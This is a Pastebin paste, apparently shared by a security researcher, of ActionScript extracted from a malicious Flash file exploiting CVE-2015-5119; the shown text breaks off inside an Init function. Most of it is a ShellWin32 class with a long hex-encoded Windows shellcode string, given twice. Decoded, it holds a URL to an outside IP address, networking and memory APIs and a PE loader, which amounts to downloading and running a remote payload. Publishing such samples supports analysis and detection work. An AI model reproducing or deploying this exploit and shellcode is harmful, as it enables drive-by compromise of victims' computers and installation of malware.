API tools faq
paste
Advertisement
bartblaze

CVE-2015-5119 / Win x86 shellcode

bartblaze
Jul 8th, 2015
546
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
ActionScript 42.19 KB | None | 0 0
raw download clone embed print report
  1. Extracted ActionScript for Win x86 from e747df46e21036505780f2f7e48775147d815c3591f1c91514328a36aa84b9de also known as: CVE-2015-5119
  2. https://helpx.adobe.com/security/products/flash-player/apsa15-03.html
  3. https://twitter.com/bartblaze/status/618761630806110208
  4.  
  5.  
  6. package
  7. {
  8.    class ShellWin32 extends MyClass
  9.    {
  10.      
  11.       static var _v:Vector.<uint>;
  12.      
  13.       static var _vAddr:uint;
  14.      
  15.       static var _mc:MyClass2;
  16.      
  17.       static var _mcOffs:uint;
  18.      
  19.       static var _shellcode_32:String = String("EFBEADDE7FF18162687474703A2F2F31342E3133362E3233362E3135352F397A386F3564396C307036632E646174004141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141004B45524E454C3332004E54444C4C0057494E494E4554005348454C4C3332005669727475616C416C6C6F63005669727475616C50726F746563740043726561746546696C655700577269746546696C6500436C6F736548616E646C650047657453686F7274506174684E616D65570047657454656D7050617468570053484765744B6E6F776E466F6C64657250617468004C6F61644C6962726172795700467265654C6962726172790044656C65746546696C655700496E7465726E65744F70656E4100496E7465726E65744F70656E55726C4100487474705175657279496E666F5700496E7465726E65745265616446696C65457841005F77746F69004578697450726F636573730071776F70666E6368004D6F7A696C6C612F342E302028636F6D70617469626C653B204D53494520372E303B2057696E646F7773204E5420362E313B20574F5736343B2054726964656E742F352E303B20534C4343323B202E4E455420434C5220322E302E35303732373B202E4E455420434C5220332E352E33303732393B202E4E455420434C5220332E302E33303732393B204D656469612043656E74657220504320362E303B202E4E4554342E30433B202E4E4554342E30453B204D4444524A532900558BEC8B5508568B750C8BC6C1E80233C985C0740D578B7D10313C8A413BC872F85F8BC683E0038BCE2BC8EB0580341141413BCE72F78BC25E5DC3558BEC83EC1853568B75085733FF57575757FF750CFF563885C0747D5768000100045757FF751050FF563C8BD885DB74688D4508508D45FC508D45E8506A0553C745FC10000000897D08FF56448D45E850FF5648598B4D146A04680010000050578901FF560C8BF88B4514FF30575356E82B00000083C41085C0741D837D1C007413FF75188B4514FF3057E835FFFFFF83C40CEB068BC7EB0233C05F5E5BC9C3558BEC83EC28566A285E568D45D86A0050E8AF0600008B45108365DC0083C40C8945EC6A006A048D45D850FF750C8B45088975D88B75148975F0FF504085C0740A3975F0750533C040EB0233C05EC9C3558BEC5164A1300000005356578B780C83CBFF83C7148B37EB450FB7461C6685C0743A8BC88B4620D1E96A0D8D044883C0E66A01508945FCE80B01000083C40C3DFFDBEC8F741E6A0D6A01FF75FCE8F500000083C40C3DD7CF2B6E74088B363BF775B7EB038B5E105F5E8BC35BC9C3558BEC83EC0C56E885FFFFFF8B4D108BF0893183FEFF750733C0E9B70000008B463C538B44307803C633DB8B481C8B502003CE894DFC8B482403CE894D108B4D0803D689198B4D0C5789198945F88955F48BFB395818767A8B1CBA6A0E03DE6A0053E87200000083C40C3DAAFC0D7C75328B45108B4DFC0FB704788B04818B4D0803C689018B4D0C8B4508833800740583390075388B45F8473B781873348B55F4EBB56A0C6A0053E82C00000083C40C3D8E4E0EEC75CE8B45108B4DFC0FB704788B04818B4D0C03C68901EBBB33C040EB0233C05F5B5EC9C3558BEC8B5508568B751033C9EB11C1C90D0FBE024E03C842837D0C0074014285F675EB8BC15E5DC3558BEC53578B7D088D4D08518D4708508D5F0453E8E6FEFFFF83C40C85C00F846A0100008B07568B750805BD0000005056FF1389470C8B0705CA0000005056FF138947108B07050D0100005056FF138947248B0705FB0000005056FF138947208B07052F0100005056FF1389472C8B07053C0100005056FF138947308B0705480100005056FF138947348B0705D90000005056FF138947148B0705E50000005056FF138947188B0705EF0000005056FF1389471C8B07059C0100005056FF1389474C8B0705AD00000050FF57088B0F81C1540100008BF05156FF138B0F89473881C1620100005156FF1389473C8B0705820100005056FF138947408B0705730100005056FF138947448B0705A700000050FF57088B0F81C1960100005150FF138947488B0705B500000050FF57088B0F81C11A0100005150FF1389472833C05E39470C74493947107444394724743F394720743A39472C74353947307430394714742B394718742639471C742139474C741C394738741739473C7412394740740D3947447408394748740340EB0233C05F5B5DC3558BEC83EC54568B75088D45AC508975ACE856FEFFFF5985C0746E33C0394604570F95C050FF76048D45FC508D4608508D86B1010000508D45AC50E8CCFBFFFF33F683C41833FF89750885C074188D4D0851508D45AC50E8550000008B750883C40C8BF8EB056A00FF55F885FF740E64A13000000050FFD78B7508EB056A00FF55F85F85F67402FFD65EC9C390E800000000582500F0FFFFE8000000005E90BBEFBEADDE3B1E74034EEBF456E84FFFFFFF558BEC81EC740100008B4510538B5D0C5733FF6A4089388D45AC5350E85B020000B84D5A000083C40C663945AC740733C0E9420200008B45E803C368F8000000508D85B4FEFFFF50E82F02000083C40C81BDB4FEFFFF5045000075D38B4508566A046800100000FFB504FFFFFF57FF500C8BF085F60F84FC0100000FB78DC8FEFFFF8B45E883C01803C18945F003C36A28508D858CFEFFFF50E8DE010000FFB5A0FEFFFF5356E8D101000033C083C418897DFC663B85BAFEFFFF733A8B7DF083C71003FE8B4FFC8B47F803CE39070F4207508B470403C35051E89E0100008B45FC83C40C408945FC8D7F28663B85BAFEFFFF72D033FF8B8D54FFFFFF8B8558FFFFFF85C9746D85C074698D1C318BF86A088D45F45350E8610100008B45F883C40C2BF883C30883E8088945F874416A028D45FC5350E8420100008B4DFC8B45FC81E1FF0F0000034DF42500F00000BA0030000083C40C663BC2750B8BC62B85E8FEFFFF01043183C302836DF80275BF85FF759C8B8534FFFFFF85C0745403C6EB4B8B481085C974498B400C03C6508B45088D1C31FF50088BC8894DF885C97426EB208B0385C079050FB7C0EB0583C00203C6508B450851FF50048B4DF8890383C304393B75DC8B45FC83C0148945FC75B08B563C397C327C74458B5432788955FC85D2743A017432200174321C017432248B5C32208B4C321C897DF8397C3218761D2BD9013101340B8B55108B0189028B55FC478D49043B7C321872E733FF33C0897DEC663B85BAFEFFFF73328B5DF083C30803DEF7431C0000002074148D45EC508B43046A40FF3303C6508B4508FF50104783C328663BBDBAFEFFFF72D68D45EC508B45086A02FF75F056FF50108B85DCFEFFFF03C65E5F5BC9C3558BEC83EC0C8B450C8945F88B45088945FC8B45108945F48B451048894510837DF400741A8B45FC8B4DF88A0988088B45FC408945FC8B45F8408945F8EBD38B4508C9C3558BEC518365FC00EB078B45FC408945FC8B45FC3B4510730D8B45080345FC8A4D0C8808EBE4C9C3414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141");
  20.      
  21.       static var _x32:Vector.<uint> = Vector.<uint>([2.425393296E9,2.215624755E9,1875,3.435973836E9,3.435973836E9,3.435973836E9,3.435973836E9,3.435973836E9,3.435973836E9,3.435973836E9,3.435973836E9,3.435973836E9,3.435973836E9,3.435973836E9]);
  22.      
  23.       {
  24.          _shellcode_32 = String("EFBEADDE7FF18162687474703A2F2F31342E3133362E3233362E3135352F397A386F3564396C307036632E646174004141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141004B45524E454C3332004E54444C4C0057494E494E4554005348454C4C3332005669727475616C416C6C6F63005669727475616C50726F746563740043726561746546696C655700577269746546696C6500436C6F736548616E646C650047657453686F7274506174684E616D65570047657454656D7050617468570053484765744B6E6F776E466F6C64657250617468004C6F61644C6962726172795700467265654C6962726172790044656C65746546696C655700496E7465726E65744F70656E4100496E7465726E65744F70656E55726C4100487474705175657279496E666F5700496E7465726E65745265616446696C65457841005F77746F69004578697450726F636573730071776F70666E6368004D6F7A696C6C612F342E302028636F6D70617469626C653B204D53494520372E303B2057696E646F7773204E5420362E313B20574F5736343B2054726964656E742F352E303B20534C4343323B202E4E455420434C5220322E302E35303732373B202E4E455420434C5220332E352E33303732393B202E4E455420434C5220332E302E33303732393B204D656469612043656E74657220504320362E303B202E4E4554342E30433B202E4E4554342E30453B204D4444524A532900558BEC8B5508568B750C8BC6C1E80233C985C0740D578B7D10313C8A413BC872F85F8BC683E0038BCE2BC8EB0580341141413BCE72F78BC25E5DC3558BEC83EC1853568B75085733FF57575757FF750CFF563885C0747D5768000100045757FF751050FF563C8BD885DB74688D4508508D45FC508D45E8506A0553C745FC10000000897D08FF56448D45E850FF5648598B4D146A04680010000050578901FF560C8BF88B4514FF30575356E82B00000083C41085C0741D837D1C007413FF75188B4514FF3057E835FFFFFF83C40CEB068BC7EB0233C05F5E5BC9C3558BEC83EC28566A285E568D45D86A0050E8AF0600008B45108365DC0083C40C8945EC6A006A048D45D850FF750C8B45088975D88B75148975F0FF504085C0740A3975F0750533C040EB0233C05EC9C3558BEC5164A1300000005356578B780C83CBFF83C7148B37EB450FB7461C6685C0743A8BC88B4620D1E96A0D8D044883C0E66A01508945FCE80B01000083C40C3DFFDBEC8F741E6A0D6A01FF75FCE8F500000083C40C3DD7CF2B6E74088B363BF775B7EB038B5E105F5E8BC35BC9C3558BEC83EC0C56E885FFFFFF8B4D108BF0893183FEFF750733C0E9B70000008B463C538B44307803C633DB8B481C8B502003CE894DFC8B482403CE894D108B4D0803D689198B4D0C5789198945F88955F48BFB395818767A8B1CBA6A0E03DE6A0053E87200000083C40C3DAAFC0D7C75328B45108B4DFC0FB704788B04818B4D0803C689018B4D0C8B4508833800740583390075388B45F8473B781873348B55F4EBB56A0C6A0053E82C00000083C40C3D8E4E0EEC75CE8B45108B4DFC0FB704788B04818B4D0C03C68901EBBB33C040EB0233C05F5B5EC9C3558BEC8B5508568B751033C9EB11C1C90D0FBE024E03C842837D0C0074014285F675EB8BC15E5DC3558BEC53578B7D088D4D08518D4708508D5F0453E8E6FEFFFF83C40C85C00F846A0100008B07568B750805BD0000005056FF1389470C8B0705CA0000005056FF138947108B07050D0100005056FF138947248B0705FB0000005056FF138947208B07052F0100005056FF1389472C8B07053C0100005056FF138947308B0705480100005056FF138947348B0705D90000005056FF138947148B0705E50000005056FF138947188B0705EF0000005056FF1389471C8B07059C0100005056FF1389474C8B0705AD00000050FF57088B0F81C1540100008BF05156FF138B0F89473881C1620100005156FF1389473C8B0705820100005056FF138947408B0705730100005056FF138947448B0705A700000050FF57088B0F81C1960100005150FF138947488B0705B500000050FF57088B0F81C11A0100005150FF1389472833C05E39470C74493947107444394724743F394720743A39472C74353947307430394714742B394718742639471C742139474C741C394738741739473C7412394740740D3947447408394748740340EB0233C05F5B5DC3558BEC83EC54568B75088D45AC508975ACE856FEFFFF5985C0746E33C0394604570F95C050FF76048D45FC508D4608508D86B1010000508D45AC50E8CCFBFFFF33F683C41833FF89750885C074188D4D0851508D45AC50E8550000008B750883C40C8BF8EB056A00FF55F885FF740E64A13000000050FFD78B7508EB056A00FF55F85F85F67402FFD65EC9C390E800000000582500F0FFFFE8000000005E90BBEFBEADDE3B1E74034EEBF456E84FFFFFFF558BEC81EC740100008B4510538B5D0C5733FF6A4089388D45AC5350E85B020000B84D5A000083C40C663945AC740733C0E9420200008B45E803C368F8000000508D85B4FEFFFF50E82F02000083C40C81BDB4FEFFFF5045000075D38B4508566A046800100000FFB504FFFFFF57FF500C8BF085F60F84FC0100000FB78DC8FEFFFF8B45E883C01803C18945F003C36A28508D858CFEFFFF50E8DE010000FFB5A0FEFFFF5356E8D101000033C083C418897DFC663B85BAFEFFFF733A8B7DF083C71003FE8B4FFC8B47F803CE39070F4207508B470403C35051E89E0100008B45FC83C40C408945FC8D7F28663B85BAFEFFFF72D033FF8B8D54FFFFFF8B8558FFFFFF85C9746D85C074698D1C318BF86A088D45F45350E8610100008B45F883C40C2BF883C30883E8088945F874416A028D45FC5350E8420100008B4DFC8B45FC81E1FF0F0000034DF42500F00000BA0030000083C40C663BC2750B8BC62B85E8FEFFFF01043183C302836DF80275BF85FF759C8B8534FFFFFF85C0745403C6EB4B8B481085C974498B400C03C6508B45088D1C31FF50088BC8894DF885C97426EB208B0385C079050FB7C0EB0583C00203C6508B450851FF50048B4DF8890383C304393B75DC8B45FC83C0148945FC75B08B563C397C327C74458B5432788955FC85D2743A017432200174321C017432248B5C32208B4C321C897DF8397C3218761D2BD9013101340B8B55108B0189028B55FC478D49043B7C321872E733FF33C0897DEC663B85BAFEFFFF73328B5DF083C30803DEF7431C0000002074148D45EC508B43046A40FF3303C6508B4508FF50104783C328663BBDBAFEFFFF72D68D45EC508B45086A02FF75F056FF50108B85DCFEFFFF03C65E5F5BC9C3558BEC83EC0C8B450C8945F88B45088945FC8B45108945F48B451048894510837DF400741A8B45FC8B4DF88A0988088B45FC408945FC8B45F8408945F8EBD38B4508C9C3558BEC518365FC00EB078B45FC408945FC8B45FC3B4510730D8B45080345FC8A4D0C8808EBE4C9C3414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141");
  25.          _x32 = Vector.<uint>([2.425393296E9,2.215624755E9,1875,3.435973836E9,3.435973836E9,3.435973836E9,3.435973836E9,3.435973836E9,3.435973836E9,3.435973836E9,3.435973836E9,3.435973836E9,3.435973836E9,3.435973836E9]);
  26.       }
  27.      
  28.       function ShellWin32()
  29.       {
  30.          super();
  31.       }
  32.      
  33.       static function Hex(param1:uint) : String
  34.       {
  35.          if(param1 <= 9)
  36.          {
  37.             return param1.toString();
  38.          }
  39.          return "0x" + param1.toString(16);
  40.       }
  41.      
  42.       static function Init(param1:Vector.<uint>, param2:uint, param3:MyClass2, param4:uint) : Boolean
  43.       {
  44.          _v = param1;
  45.          _vAddr = param2;
